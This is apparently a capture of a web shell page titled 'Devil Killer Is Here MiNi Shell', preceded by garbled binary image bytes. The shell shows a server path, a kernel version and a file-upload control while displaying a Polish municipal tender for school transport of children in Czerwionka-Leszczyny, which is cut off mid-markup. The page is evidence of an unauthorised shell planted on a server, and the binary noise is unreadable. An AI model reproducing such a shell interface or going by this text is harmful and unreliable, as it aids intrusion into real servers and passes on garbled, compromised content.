JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230711/0030028401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci z terenu Gminy i Miasta Czerwionka-Leszczyny do Zespołu Szkół nr 6 w Rybniku-Boguszowicach w roku szkolnym 2023/2024 – Trasa Nr 5” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA I MIASTO CZERWIONKA-LESZCZYNY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258530</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Parkowa 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czerwionka-Leszczyny</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@czerwionka-leszczyny.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.czerwionka-leszczyny.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci z terenu Gminy i Miasta Czerwionka-Leszczyny do Zespołu Szkół nr 6 w Rybniku-Boguszowicach w roku szkolnym 2023/2024 – Trasa Nr 5” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7a100385-1be3-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00300284</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00020609/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Dowóz dzieci z terenu Gminy i Miasta Czerwionka-Leszczyny do Zespołu Szkół Nr 6 w Rybniku -Boguszowicach w roku szkolnym 2023/2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7a100385-1be3-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu: <br/><br/>1)	Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.,<br/>2)	poczty elektronicznej: zp@czerwionka-leszczyny.com.pl, <br/>3)	strony internetowej prowadzonego postępowania: <br/>https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7a100385-1be3-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat<br/>zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-<br/>Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum<br/>Pomocy”.<br/>2 . Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-<br/>Zamówienia ani logowania.<br/>3. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>RM w sprawie wymagań dla dokumentów elektronicznych.<br/>4. Ofertę (formularz ofertowy) wraz z załącznikami a także podmiotowe środki dowodowe, o których mowa w SWZ, sporządza się w<br/>postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia RM w sprawie Krajowych Ram<br/>Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>5. Informacje, oświadczenia lub dokumenty, inne niż wymienione w pkt 4, przekazywane w postępowaniu sporządza się w postaci<br/>elektronicznej:<br/>a)w formatach danych określonych w przepisach rozporządzenia RM w sprawie Krajowych Ram Interoperacyjności (i przekazuje się<br/>jako załącznik), lub<br/>b)jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>6. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do<br/>komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W przypadku<br/>załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów<br/>elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być<br/>opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia, podpisem zewnętrznym<br/>lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>10. W przedmiotowym postępowaniu Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>zp@czerwionka-leszczyny.com.pl (nie dotyczy składania ofert).<br/>11. Pozostałe wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej –zgodnie z pkt 8 i 12 SWZ.<br/>12. Pozostałe informacje dotyczące użycia podpisu elektronicznego – zgodnie z pkt 12 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązki informacyjne o których mowa w art 13 ust 1-3<br/>Rozporządzenia Parlamentu Europejskiego i Rady UE 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE (ogólne rozporządzenie o ochronie danych) przez zamieszczenie wymaganych informacji w dokumentach zamówienia, w<br/>tym w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.9.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa transportowa dla dzieci z terenu Gminy i Miasta Czerwionka-Leszczyny do Zespołu Szkół nr 6 w Rybniku-Boguszowicach w roku szkolnym 2023/2024 – Trasa Nr 5 do szkoły i ze szkoły tylko w dniach nauki szkolnej (w dniach w których odbywają się lekcje) w roku szkolnym 2023/2024 tj. w okresie od 4.09.2023 r. do 21.06.2024 r. (łącznie 190 dni tylko zajęć szkolnych).<br/><br/>W przypadku czasowego zamknięcia w roku szkolnym 2023/2024 placówek oświatowych<br/>z powodu np. dni dyrektorskich, epidemii koronawirusa zamówienie w tym okresie nie będzie realizowane. Zamówienie będzie realizowane tylko w dniach nauki szkolnej<br/>tj. w dniach, w których zajęcia szkolne odbywają się na terenie placówki oświatowej (nie dotyczy to dni kiedy placówki oświatowe są zamknięte lub nauka realizowana jest zdalnie).<br/><br/>2. Długość trasy przejazdu w obie strony codziennie będzie wynosiła 84 km tj.: 2 x 42 km<br/><br/>3. Trasa przejazdu, będzie miała następujący przebieg:<br/><br/>rozpoczęcie - sołectwo Palowice: ul. Palowicka - ul. Wiejska (I przystanek: „PA” Palowice - Centrum obok Restauracji Palowiczanka przy ulicy Wiejskiej) - ul. Wiejska - ul. Bełkowska - sołectwo Bełk ul. Palowicka - ul. Główna - (II przystanek: „PA” Bełk Szpital) - ul. Główna - Sołectwo Stanowice - ul. Zwycięstwa - ul. Wyzwolenia - dzielnica Czerwionka - ul. Furgoła - ul. Parkowa (III przystanek: przy Urzędzie Gminy i Miasta Czerwionka-Leszczyny) - na rondzie pierwszy zjazd w ul. Furgoła (IV przystanek: „PA” Dębieńsko Szyb VI) - dzielnica Dębieńsko - ul. Odrodzenia - ul. Górnicza - ul. Przemysłowa - dzielnica Czuchów - ul. 3 Maja (V przystanek: „PA” Czuchów Sklep) - ul. Cmentarna - ul. Szewczyka - (VI przystanek: skrzyżowanie ulic Szewczyka z Rybnicką) - ul. Rybnicka - dzielnica Leszczyny - (VII przystanek: ul. Rybnicka 46/1) - ul. Polna - Armii Krajowej - ul. Pojdy - ul. Czereśniowa - ul. Konopnickiej (VIII przystanek: „PA” Leszczyny Konopnickiej) - ul. Czereśniowa - ul. Pojdy - ul. Leszczyńska - sołectwo Przegędza - ul. Mikołowska - Miasto Rybnik - Stawowa - ul. Przemysłowa - ul. Miarki - ul. Prosta - rondo Boguszowickie drugi zjazd - ul. Boguszowicka - ul. Małachowskiego (IX przystanek: „PA” przy Zespole Szkół nr 6 ul. Stanisława Małachowskiego 145, 44-251 Rybnik) <br/><br/>gdzie “PA” - oznacza istniejący przystanek autobusowy<br/><br/>Droga powrotna : trasa przejazdu jak wyżej w odwrotnym kierunku.<br/><br/>4. Ilość przewożonych dzieci: 10<br/><br/>5. Wykonawca zobowiązany jest do zapewnienia opieki nad przewożonymi dziećmi, bezpiecznego ulokowania dzieci w pojeździe oraz zapewnienie bezpieczeństwa podczas wsiadania i wysiadania z pojazdu przez dzieci. W tym celu musi zapewnić na swój koszt co najmniej 1 (jednego) opiekuna dzieci na całej trasie przejazdu w obie strony, przeszkolonego z pomocy przedmedycznej lub posiadającego dyplom pielęgniarki zawodowej/pielęgniarza zawodowego. Opiekunem dzieci musi być osoba pełnoletnia, mająca pełną zdolność do czynności prawnych, która daje rękojmię bezpiecznego dojazdu dzieci do szkoły i ze szkoły. Ponadto opiekun nie może widnieć w rejestrze sprawców przestępstw na tle seksualnym.<br/><br/><br/>6. Wykonawca musi dysponować co najmniej jednym pełnosprawnym autobusem, który umożliwi przewóz łącznie 11 (jedenastu ) osób, bez kierowcy (z miejscami siedzącymi dla wszystkich dzieci oraz 1 opiekuna).<br/><br/>7. Autobus musi umożliwiać bezpieczny przewóz dzieci niepełnosprawnych i być dostosowany do rodzaju niepełnosprawności przewożonych dzieci. <br/><br/>Musi posiadać pasy bezpieczeństwa dostosowane do rodzaju niepełnosprawności oraz wzrostu dzieci<br/>Wykonawca jest zobowiązany dostosować autobus do przewozu dzieci niepełnosprawnych na własny koszt. Ww. dotyczy również ewentualnego przywrócenia środka transportu do stanu pierwotnego.<br/><br/>8 Zamawiający zastrzega sobie, że w przypadku zaoferowania w ofercie przez Wykonawcę autobusu umożliwiającego przewóz większej ilości osób niż 11 Zamawiający ma prawo zwiększyć ilość przewożonych dzieci do liczby wolnych miejsc<br/>w zaoferowanym pojeździe.<br/><br/>9 Zmiany (zwiększenie) ilości przewożonych dzieci, o których mowa powyżej, pozostaną bez wpływu na wynagrodzenie Wykonawcy (nastąpią w ramach tego wynagrodzenia) oraz bez wpływu na trase przejazdu, o której mowa w pkt. 2.<br/><br/>10. Wykonawca jest zobowiązany do wykonywania zamówienia sprawnym technicznie autobusem, posiadającym aktualne badania techniczne oraz polisę ubezpieczenia OC<br/>i NW, każdego dnia roboczego w dniach nauki szkolnej, z wyjątkiem okresów wolnych od zajęć. Ponadto w trakcie realizacji zamówienia wykonawca musi posiadać zezwolenie na wykonywanie przewozów regularnych specjalnych w krajowym transporcie drogowym.<br/><br/>11. Dowóz i odwóz dzieci odbywać się będzie według harmonogramu ustalonego przez Dyrektora Zespołu Szkół Nr 6 w Rybniku, do którego Wykonawca jest zobowiązany się dostosować, przy założeniu, że dowóz uczniów rozpoczynać się będzie nie później niż<br/>o godz. 5:45 z pierwszego przystanku, a przyjazd do szkoły nastąpi nie później niż o godz. 7:00, oraz że powrót uczniów ze szkoły odbywać się będzie pomiędzy godz. 16:45 – 17:45 <br/><br/>12. Przewozy rozliczane będą na podstawie podanej w ofercie przez Wykonawcę ceny brutto za 1 km przejazdu (przewozu) usługi transportowej, obejmującej również koszt opiekuna.<br/><br/>13. Zamawiający finansuje jedynie przewóz dzieci od pierwszego do ostatniego przystanku, zgodnie z trasą przejazdu. Zamawiający nie pokrywa kosztów dojazdu autobusu z bazy i do bazy Wykonawcy.<br/><br/>14. Wykonawca zobowiązany jest do kontaktu telefonicznego z rodzicami dziecka<br/>z sołectwa Palowice każdorazowo przed opuszczeniem bazy w celu ustalenia konieczności wykonania usługi w danym dniu nauki szkolnej.<br/>W przypadku nieobecności dziecka z sołectwa Palowice, trasa ulegnie skróceniu o 10,2 km (2x5,1 km). Wykonawcy przysługiwać będzie w takim przypadku wynagrodzenie za faktycznie wykonaną trasę przejazdu (ilość kilometrów). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-04 do 2024-06-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Kryterium cena:<br/>Za oferowaną cenę brutto za 1 km przewozu (przejazdu) maksymalnie można otrzymać 60 pkt.<br/>Wykonawcy otrzymują ilość punktów wyliczoną wg poniższego wzoru:<br/>X1 = Cn / Cw x 60% x 100,<br/>gdzie:<br/>X1 - ilość punktów przyznanych ocenianej ofercie w kryterium cena wyliczona<br/>z dokładnością do dwóch miejsc po przecinku,<br/>Cn - najniższa zaoferowana cena brutto za 1 km przewozu (przejazdu), spośród<br/>wszystkich ofert niepodlegających odrzuceniu,<br/>Cw - cena brutto za 1 km przewozu (przejazdu) danego Wykonawcy zaoferowana<br/>w badanej ofercie.<br/>2) Kryterium rok produkcji pojazdu przeznaczonego do dowozu dzieci:<br/>Za rok produkcji zaoferowanego pojazdu przeznaczonego do dowozu dzieci maksymalnie można otrzymać 10 pkt.<br/>W przypadku gdy Wykonawca w ofercie wskaże więcej niż 1 pojazd przeznaczony do dowozu dzieci, Zamawiający w celu<br/>przyznania punktów w przedmiotowym kryterium, weźmie do wyliczeń pod uwagę pojazd, który został najwcześniej wyprodukowany.<br/>Podany przez Wykonawcę rok produkcji pojazdu przeznaczonego do dowozu dzieci będzie punktowany zgodnie z poniższym<br/>zestawieniem:<br/>a) 2023 rok X2 = 10 pkt<br/>b) 2022 rok X2= 9 pkt<br/>c) 2021 rok X2 = 8 pkt,<br/>d) 2020 rok X2 = 7 pkt,<br/>e) 2019 rok X2 = 6 pkt,<br/>f) 2018 rok X2 = 5 pkt,<br/>g) 2017 rok X2 = 4 pkt,<br/>h) 2016 rok X2 = 3 pkt,<br/>i) 2015 rok X2 = 2 pkt,<br/>j) 2014 rok X2 = 1 pkt,<br/>W przypadku, gdy zaoferowany przez Wykonawcę pojazd będzie wyprodukowany wcześniej niż w 2014 roku, oferta Wykonawcy<br/>otrzyma w przedmiotowym kryterium 0 punktów X2 = 0 pkt.<br/>Odpowiednią ilość punktów w przedmiotowym kryterium otrzymają wszystkie oferty niepodlegające odrzuceniu.<br/>3) Kryterium wysokość kary umownej za każdy dzień nie wykonania lub każdy przypadek nienależytego wykonania umowy:<br/>Wykonawca zobowiązany jest podać w ofercie wysokość kary umownej za każdy dzień nie wykonania lub każdy przypadek<br/>nienależytego wykonania umowy wskazując (wybierając) jedną z poniższych kar:<br/>a) 1 % lub,<br/>b) 2 % lub,<br/>c) 3 %<br/>- łącznej wartości umowy (cena brutto za 1 km przewozu x 190 dni świadczenia usługi x 84 km.)<br/>Za wysokość ww. kary umownej maksymalnie można otrzymać 30 pkt.<br/>Wysokość kary umownej za każdy dzień nie wykonania lub każdy przypadek nienależytego wykonania umowy podana przez<br/>Wykonawcę w ofercie będzie punktowana zgodnie z poniższym zestawieniem:<br/>a) 1 % - X3 = 0 pkt,<br/>b) 2 % - X3 = 15 pkt,<br/>c) 3 % - X3 = 30 pkt.<br/>X3 – ilość punktów przyznanych ocenianej ofercie w kryterium wysokość kary umownej za każdy dzień nie wykonania lub każdy<br/>przypadek nienależytego wykonania umowy.<br/>Odpowiednią ilość punktów w przedmiotowym kryterium otrzymają wszystkie oferty niepodlegające odrzuceniu.<br/>Za najkorzystniejszą ofertę zostanie uznana ta oferta, która spełni wszystkie wymagania określone w Specyfikacji Warunków<br/>Zamówienia i otrzyma największą łączną ilość punktów, wyliczoną zgodnie ze wzorem:<br/>X = X1 + X2 + X3<br/>gdzie:<br/>X – łączna ilość punktów przyznanych ocenianej ofercie,<br/>X1 – ilość punktów przyznanych ocenianej ofercie w kryterium cena,<br/>X2 – ilość punktów przyznanych ocenianej ofercie w kryterium rok produkcji pojazdu przeznaczonego do dowozu dzieci,<br/>X3 – ilość punktów przyznanych ocenianej ofercie w kryterium wysokość kary umownej za każdy dzień nie wykonania lub każdy<br/>przypadek nienależytego wykonania umowy<br/>Pełne informacje dotyczące sposobu oceny ofert - zgodnie z pkt. 17 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rok produkcji pojazdu przeznaczonego do dowozu dzieci</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokość kary umownej za każdy dzień nie wykonania lub każdy przypadek nienależytego wykonania umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 